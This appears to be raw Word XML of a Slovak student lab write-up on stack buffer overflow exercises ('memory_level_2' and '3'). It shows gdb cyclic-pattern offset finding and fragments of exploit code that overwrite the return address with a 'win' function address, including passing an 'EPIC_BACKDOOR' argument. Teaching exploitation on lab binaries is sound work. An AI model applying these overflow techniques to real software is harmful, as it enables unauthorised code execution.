    <w:p w14:paraId="40BA4CBD" w14:textId="6DDB6D7A" w:rsidR="004C1622" w:rsidRPr="004C1622" w:rsidRDefault="004C1622" w:rsidP="004C1622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F7E71" wp14:editId="2F8B8A86">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3881582</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>231140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1246909" cy="29146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8B013" w14:textId="2461D52F" w:rsidR="004C1622" w:rsidRPr="004C1622" w:rsidRDefault="004C1622" w:rsidP="004C1622">
                            <w:pPr>
                              <w:spacing w:after="0"/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7E71" id="Rectangle 8" o:spid="_x0000_s1027" style="position:absolute;margin-left:305.65pt;margin-top:18.2pt;width:98.2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" filled="f" stroked="f" strokeweight="2.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7E98B013" w14:textId="2461D52F" w:rsidR="004C1622" w:rsidRPr="004C1622" w:rsidRDefault="004C1622" w:rsidP="004C1622">
                      <w:pPr>
                        <w:spacing w:after="0"/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Buff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50168" wp14:editId="0760AEB9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3879273</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1444106</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1246909" cy="2914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D469" w14:textId="024A5E7C" w:rsidR="004C1622" w:rsidRPr="004C1622" w:rsidRDefault="004C1622" w:rsidP="004C1622">
                            <w:pPr>
                              <w:spacing w:after="0"/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1622"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Návratová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0168" id="Rectangle 6" o:spid="_x0000_s1028" style="position:absolute;margin-left:305.45pt;margin-top:113.7pt;width:98.2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" filled="f" stroked="f" strokeweight="2.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7788D469" w14:textId="024A5E7C" w:rsidR="004C1622" w:rsidRPr="004C1622" w:rsidRDefault="004C1622" w:rsidP="004C1622">
                      <w:pPr>
                        <w:spacing w:after="0"/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 w:rsidRPr="004C1622"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Návratová adre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1A111" wp14:editId="7C4D9384">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>697865</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>320502</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3124200" cy="1524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A58C6" id="Rectangle 5" o:spid="_x0000_s1026" style="position:absolute;margin-left:54.95pt;margin-top:25.25pt;width:24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4EE7F" wp14:editId="42E35923">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>699655</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1520710</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3124200" cy="1524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AAB7C" id="Rectangle 4" o:spid="_x0000_s1026" style="position:absolute;margin-left:55.1pt;margin-top:119.75pt;width:24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" filled="f" strokecolor="#00b050" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="004C1622">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D4F27E4" wp14:editId="6F9A5086">
            <wp:extent cx="5731510" cy="2967355"/>
            <wp:effectExtent l="0" t="0" r="254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9648" w14:textId="268C351D" w:rsidR="002C08DF" w:rsidRPr="00513D64" w:rsidRDefault="004C1622" w:rsidP="00513D6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  <w:r w:rsidRPr="004C1622">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742D2CB6" w14:textId="10787B10" w:rsidR="002C08DF" w:rsidRPr="002C08DF" w:rsidRDefault="002C08DF" w:rsidP="002C08DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00F7282A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Prepísanie návratovej adresy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114FA597" w14:textId="5A3EF7A5" w:rsidR="00513D64" w:rsidRDefault="00513D64" w:rsidP="00513D6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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:t>Pomocou offsetu sme vedeli, aký veľký reťazec máme poslať pred adresou win funkcie</w:t>
      </w:r>
      <w:r w:rsidR="00FF2CBE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:t>, pričom sme nemohli prekročiť veľkosť vstupu 126.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395D3767" w14:textId="175CA786" w:rsidR="00513D64" w:rsidRDefault="00513D64" w:rsidP="00513D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divId w:val="88448380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48232BE8" w14:textId="04C834B6" w:rsidR="00513D64" w:rsidRDefault="00513D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8380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ces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/memory_level_2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85833AF" w14:textId="47323926" w:rsidR="00513D64" w:rsidRDefault="00513D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8380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r w:rsidR="008D5284">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>126"</w:t>
      </w:r>
      <w:r w:rsidR="008D5284">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">)                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># max velkost vstupu = 126</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B54EFD" w14:textId="745098A4" w:rsidR="00513D64" w:rsidRDefault="00513D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8380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120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64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x401216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 w:rsidR="008D52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offset + adresa win funkcie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4AF208" w14:textId="55270AEA" w:rsidR="00513D64" w:rsidRPr="00513D64" w:rsidRDefault="00513D64" w:rsidP="00513D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84483803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20E89AA6" w14:textId="5385761A" w:rsidR="002C08DF" w:rsidRPr="002C08DF" w:rsidRDefault="00513D64" w:rsidP="002C08DF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  <w:r w:rsidRPr="00513D64">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4791B4EF" wp14:editId="16657D8B">
            <wp:extent cx="5731510" cy="127762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1010" w14:textId="77777777" w:rsidR="002A1BF9" w:rsidRDefault="002A1BF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1043829A" w14:textId="2D233940" w:rsidR="000C3308" w:rsidRPr="004464F8" w:rsidRDefault="02999ACC" w:rsidP="000C3308">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Level 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532C20B9" w14:textId="3CB31D2B" w:rsidR="00F10F9D" w:rsidRDefault="00A2199D" w:rsidP="004D0ECA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vyžaduje 2 vstupy = počet a veľkosť payloadov, </w:t>
      </w:r>
      <w:r w:rsidR="00F10F9D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ktorých</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> veľkosť dokopy nesmie prekročiť </w:t>
      </w:r>
      <w:r w:rsidR="009149D7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">63 </w:t>
      </w:r>
      <w:r w:rsidR="009149D7"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0x3f</w:t>
      </w:r>
      <w:r w:rsidR="009149D7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, čo je na </w:t>
      </w:r>
      <w:r w:rsidR="00F10F9D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> málo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5FE85E" w14:textId="05546DEE" w:rsidR="00F10F9D" w:rsidRDefault="00F10F9D" w:rsidP="004D0ECA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Avšak do funkcie vuln</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10F9D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A2199D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">vstupujú 2 parametre – argumenty z príkazového riadku, pričom </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">keď </w:t>
      </w:r>
      <w:r w:rsidRPr="00A2199D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">druhý argument </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>je</w:t>
      </w:r>
      <w:r w:rsidRPr="00A2199D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> EPIC_BACKDOOR, maximálna veľkosť vstupu</w:t>
      </w:r>
      <w:r w:rsidR="00605716">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sa</w:t>
      </w:r>
      <w:r w:rsidRPr="00A2199D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> zvýši na 1000.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Preto musíme program zavolať spolu s týmto </w:t>
      </w:r>
      <w:r w:rsidR="000463B0">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>argumentom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30689891" w14:textId="4D07A974" w:rsidR="00A2199D" w:rsidRPr="00F10F9D" w:rsidRDefault="00A2199D" w:rsidP="00A2199D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A2199D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E7A6AEC" wp14:editId="30317803">
            <wp:extent cx="5731200" cy="1241729"/>
            <wp:effectExtent l="0" t="0" r="3175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30711"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="124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4C76" w14:textId="745D0AC2" w:rsidR="00A2199D" w:rsidRPr="00F10F9D" w:rsidRDefault="00A2199D" w:rsidP="00F10F9D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F10F9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/memory_level_3 EPIC_BACKDOOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C358D26" w14:textId="072A431B" w:rsidR="00A2199D" w:rsidRPr="00A2199D" w:rsidRDefault="00A2199D" w:rsidP="00A2199D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A2199D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D40AE43" wp14:editId="3AB45CA5">
            <wp:extent cx="3596952" cy="548688"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="18" name="Picture 18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ign, clos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72F" w14:textId="77777777" w:rsidR="00E15F11" w:rsidRDefault="00E15F11" w:rsidP="005F69DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC36CF4" w14:textId="53417599" w:rsidR="00513D64" w:rsidRDefault="004D0ECA" w:rsidP="005F69D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513D64" w:rsidRPr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>. Zistenie offsetu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6024920A" w14:textId="5C1CF99D" w:rsidR="005F69DD" w:rsidRPr="005F69DD" w:rsidRDefault="005F69DD" w:rsidP="004D0ECA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F69DD">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Postup bol rovnaký ako v leveli 1</w:t>
      </w:r>
      <w:r w:rsidR="00F10F9D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, teda použili sme cyklický pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00605716">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00544A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gram </w:t>
      </w:r>
      <w:r w:rsidR="00605716">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sme za</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>volali</w:t>
      </w:r>
      <w:r w:rsidR="004D0ECA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4D0ECA">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parametrom „EPIC_BACKDOOR“</w:t>
      </w:r>
      <w:r w:rsidR="00F10F9D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570F14C6" w14:textId="2DA6309A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50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5FCAC909" w14:textId="4978F846" w:rsidR="005F69DD" w:rsidRP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505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gdb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ebug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>([</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"/memory_level_3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EPIC_BACKDOOR"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</w:p>
    <w:p w14:paraId="3129456C" w14:textId="77777777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50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1000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590B64" w14:textId="45B5FB74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50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4E16B5EC" w14:textId="77777777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50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yclic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00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584DFA38" w14:textId="77777777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50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FB9AE71" w14:textId="77777777" w:rsidR="00513D64" w:rsidRPr="00513D64" w:rsidRDefault="00513D64" w:rsidP="00513D64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2"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="sk-SK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00513D64">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37772132" w14:textId="370A59E9" w:rsidR="005F69DD" w:rsidRDefault="005F69DD" w:rsidP="00513D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sk-SK"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005F69DD">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00513D64" w:rsidRPr="00513D64">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:t>gdb:</w:t>
      </w:r>
      <w:r w:rsidR="00513D64" w:rsidRPr="00513D6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k-SK"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00513D64" w:rsidRPr="004D0ECA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:t>x/gx $rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF964A5" w14:textId="2C5C5E10" w:rsidR="00513D64" w:rsidRPr="00544A2D" w:rsidRDefault="005F69DD" w:rsidP="00513D6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  <w:r w:rsidRPr="00544A2D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00513D64" w:rsidRPr="00544A2D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ostaneme adresu</w:t>
      </w:r>
      <w:r w:rsidR="00513D64" w:rsidRPr="00513D64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sk-SK"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00513D64" w:rsidRPr="00544A2D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:t>0x616161616161616c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E914CFF" w14:textId="64D00CB8" w:rsidR="005F69DD" w:rsidRPr="00513D64" w:rsidRDefault="005F69DD" w:rsidP="00513D64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</w:p>
    <w:p w14:paraId="65EED3CB" w14:textId="2F4CB22E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792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yclic_fi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x616161616161616c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86A086" w14:textId="30285053" w:rsidR="00513D64" w:rsidRPr="00513D64" w:rsidRDefault="00513D64" w:rsidP="00513D64">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="540"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00513D64">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD3864B" w14:textId="27AF3FA8" w:rsidR="004D0ECA" w:rsidRDefault="00F10F9D" w:rsidP="002A1BF9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sk-SK"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="005F69DD" w:rsidRPr="00513D64">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:t>ffset</w:t>
      </w:r>
      <w:r w:rsidR="005F69DD" w:rsidRPr="005F69DD">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
      <w:r w:rsidR="005F69DD">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00513D64" w:rsidRPr="00513D64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sk-SK"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="005F69DD" w:rsidRPr="005F69DD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sk-SK"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0929D9B0" w14:textId="77777777" w:rsidR="00C55679" w:rsidRPr="002A1BF9" w:rsidRDefault="00C55679" w:rsidP="002A1BF9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</w:p>
    <w:p w14:paraId="3C250B25" w14:textId="44749D02" w:rsidR="00513D64" w:rsidRDefault="004D0ECA" w:rsidP="00513D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13D64" w:rsidRPr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>. Prepísanie návratovej adresy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014ACDF0" w14:textId="57AD205E" w:rsidR="00F10F9D" w:rsidRPr="00F10F9D" w:rsidRDefault="00F10F9D" w:rsidP="00F10F9D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F10F9D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rovnako ako v predchádzajúcich úlohách sa poslal reťazec ako offset + adresa win funkcie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD18097" w14:textId="35FF7DAC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170085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2C3EF36E" w14:textId="77777777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170085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cess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>([</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"/memory_level_3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EPIC_BACKDOOR"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</w:p>
    <w:p w14:paraId="060D7CE2" w14:textId="6B058E8E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170085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2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E7CAD3D" w14:textId="77777777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170085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2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00ECD69" w14:textId="59DA7C10" w:rsidR="005F69DD" w:rsidRDefault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170085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88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64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x401256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 w:rsidR="00F10F9D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F10F9D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># offset + adresa win funkcie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AB6914" w14:textId="720845AD" w:rsidR="00513D64" w:rsidRPr="005F69DD" w:rsidRDefault="005F69DD" w:rsidP="005F69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170085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1D166D62" w14:textId="051DCA58" w:rsidR="00513D64" w:rsidRPr="00513D64" w:rsidRDefault="00513D64" w:rsidP="00513D64">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00513D64">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="sk-SK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07BA92EF" wp14:editId="01221618">
            <wp:extent cx="5731510" cy="141351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1D4" w14:textId="0D943AB3" w:rsidR="000C3308" w:rsidRPr="004464F8" w:rsidRDefault="02999ACC" w:rsidP="00AE11E6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Level 4</w:t>
      </w:r>
    </w:p>
